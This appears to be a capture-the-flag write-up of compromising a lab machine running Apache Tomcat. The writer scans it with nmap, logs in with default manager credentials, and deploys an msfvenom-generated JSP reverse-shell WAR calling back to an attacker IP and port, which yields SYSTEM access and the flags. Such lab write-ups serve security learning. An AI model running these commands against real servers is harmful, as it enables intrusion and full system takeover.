Here we go again, the usual initial nmap scan to kick things off:
nmap -Pn -sS 10.10.10.95 -v
Follow this up with another nmap scan delving a bit deeper into TCP 8080:
nmap -sVC -p8080 10.10.10.95 -v
Let’s head to the web browser and see what we can find there
We find a default installation of Apache Tomcat. Clicking the “Manager App” button might yield favorable results 😉
We’re prompted with a login box asking us for credentials. With the benefit of hindsight, hitting “Esc” here brings us to a 401 Error page as follows:
Here we can find some credentials which should help further our cause. Heading back to the homepage and trying to access the “/manager/html” page again, this time with our new credentials.
Now that we have got access to the Web App Manager portal, we notice a “WAR file to deploy” section. Let’s create a reverse shell using msfvenom and output the result as a .war file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=1337 -f war > rev.war
With the reverse shell generated, let’s try to upload it using the portal
And hey presto, we’ve appear to have successfully uploaded the “rev.war” shell!
Start a netcat listener on the port used in the msfvenom command above (
nc -lnvp 1337), and click the “/rev” link on the Tomcat portal
Straight away we notice that we’ve landed as the “NT AUTHORITY\SYSTEM” user.
Post-Exploitation & Loot
net user to check for other user accounts suggests that the Administrator account is the only one on this target. Let’s head over to the Administrator Desktop to go lootin’
We can see a directory labeled “flags”, inside which there are two text documents.
Checking the contents of the “lol.txt” file leads us to the loot.